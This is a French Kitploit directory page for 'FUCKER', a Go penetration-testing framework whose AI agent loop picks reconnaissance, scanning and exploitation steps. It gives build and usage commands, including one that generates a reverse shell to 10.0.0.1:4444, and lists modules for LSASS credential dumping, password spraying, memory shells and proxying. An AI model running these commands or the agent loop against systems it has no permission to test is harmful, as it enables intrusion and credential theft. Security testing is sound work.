Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
FUCKER — Framework de test d'intrusion avec moteur de décision piloté par l'IA | Kitploit
Outils/GitHubGitHub/razureink/fucker
Frameworks de Tests d'IntrusionReconnaissanceScanners de Vulnérabilités WebAnalyse des VulnérabilitésExploitationMouvement LatéralPost-ExploitationCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles
GitHub
7il y a 1 moisPas encore vérifié
razureink/fucker

FUCKER

Framework de test d'intrusion avec moteur de décision piloté par l'IA

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

FUCKER

Framework de test de pénétration natif Windows écrit en Go. Architecture modulaire avec moteur de décision piloté par IA (API compatible OpenAI).

Compilation

root@kitploit:~
go build -ldflags="-X main.version=$(git describe --tags)" -o FUCKER.exe ./cmd/fucker/

Compilation croisée :

root@kitploit:~
GOOS=linux GOARCH=amd64 go build -o FUCKER_linux_amd64 ./cmd/fucker/
GOOS=windows GOARCH=amd64 go build -o FUCKER_win_amd64.exe ./cmd/fucker/
GOOS=windows GOARCH=386 go build -o FUCKER_win_386.exe ./cmd/fucker/

Utilisation

root@kitploit:~
FUCKER.exe -t example.com -portscan -fingerprint -vulnscan -report
FUCKER.exe -t example.com -subdomain -dirbuster
FUCKER.exe -socks 1080
FUCKER.exe -forward 3389:192.168.1.100:3389
FUCKER.exe -payload "revshell|10.0.0.1|4444"

Options

Télécharger l’outil
OptionDescription
-tDomaine/IP/URL cible
-pPorts (virgule ou plage, défaut : 80,443,22,21,3389,3306,6379,27017)
-subdomainÉnumération de sous-domaines
-portscanScan de ports TCP
-fingerprintEmpreinte de services
-dirbusterForce brute de répertoires
-vulnscanScan de vulnérabilités basé sur des POC
-logicVérifications des vulnérabilités logiques
-sprayPulvérisation de mots de passe
-exploitModules d'exploitation
-reportGénérer un rapport HTML + JSON
-oFichier de sortie (défaut : report.html)
-socksDémarrer un proxy SOCKS5 sur le port
-httpproxyDémarrer un proxy HTTP sur le port
-forwardRedirection de port (local:host:remote)
-payloadGénérer un payload (revshell|IP|PORT)
-vMode verbeux
-debugSortie de débogage
-workersWorkers simultanés (défaut : 20)
-timeoutDélai d'expiration des requêtes en secondes (défaut : 30)
-proxyURL du proxy
-auditChemin du journal d'audit (défaut : audit.json)

Configuration

Copiez .env.example vers .env :

VariableDescription
OPENAI_BASE_URLURL de base de l'API compatible OpenAI
OPENAI_API_KEYClé API
OPENAI_MODEL_NAMEModèle (défaut : gpt-4)
PROXYURL du proxy
MAX_WORKERSNombre maximal de workers (défaut : 20)
REQUEST_TIMEOUTDélai d'expiration en secondes (défaut : 30)
RETRY_COUNTNouvelles tentatives (défaut : 3)

Sans configuration IA, l'outil fonctionne en mode CLI manuel (toutes les options fonctionnent normalement).

Modules

PackageDescription
cmd/fucker/Point d'entrée, analyse CLI, orchestration des modules
internal/ai/Client OpenAI, boucle d'agent ReAct, système d'outils
internal/scanner/Scan de ports, sous-domaines, empreinte, dirbuster
internal/vuln/Moteur de POC YAML, 16 POC intégrés, vérificateurs logiques
internal/exploit/Générateur de reverse shell, proxy SOCKS5/HTTP, memshell
internal/lateral/Pulvérisation de mots de passe, minidump LSASS, proxy SMB/RDP
internal/report/Rapport basé sur un modèle HTML, export JSON, évaluation des risques
internal/logger/Journalisation hiérarchisée, piste audit.json
internal/plugin/Chargeur de plugins Python/Go
internal/config/Chargeur .env
internal/common/Types partagés

Mode IA

Lorsque OPENAI_API_KEY est définie, l'outil exécute une boucle ReAct : l'agent IA décide quels outils appeler en fonction des résultats précédents. Le prompt système définit un workflow de pentest : reconnaissance -> empreinte -> scan de vulnérabilités -> exploitation -> rapport.

Sans IA, toutes les fonctionnalités sont disponibles via les options CLI.

Notes

  • Droits administrateur requis pour le minidump LSASS et les opérations sur les jetons
  • Les clés API sont automatiquement masquées dans les journaux